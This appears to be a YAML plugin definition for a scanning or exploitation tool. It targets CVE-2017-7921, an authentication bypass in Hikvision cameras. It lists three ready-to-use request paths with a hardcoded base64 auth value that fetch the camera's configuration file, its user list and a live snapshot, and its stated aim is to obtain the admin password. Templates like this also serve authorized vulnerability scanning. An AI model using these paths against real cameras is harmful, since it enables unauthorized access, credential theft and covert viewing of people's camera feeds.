info:
    app: hikvision
    name: CVE_2017_7921
    author: lz520520
    plugin_version: 1.0.0
    disclosure_date: "2017-08-03"
    create_date: "2024-10-06 07:35:57"
    update_date: "2024-10-06 07:35:57"
    scope: 海康威视摄像头
    description: 获取后台密码
    vul_id: CVE-2017-7921
    detail: |-
        /System/configurationFile?auth=YWRtaW46MTEK
        /Security/users?auth=YWRtaW46MTEK
        /onvif-http/snapshot?auth=YWRtaW46MTEK
    reference: https://seclists.org/fulldisclosure/2017/Sep/23
    vul_type: 未授权访问
payloads:
    - name: getmsg1
      alias: 获取后台密码
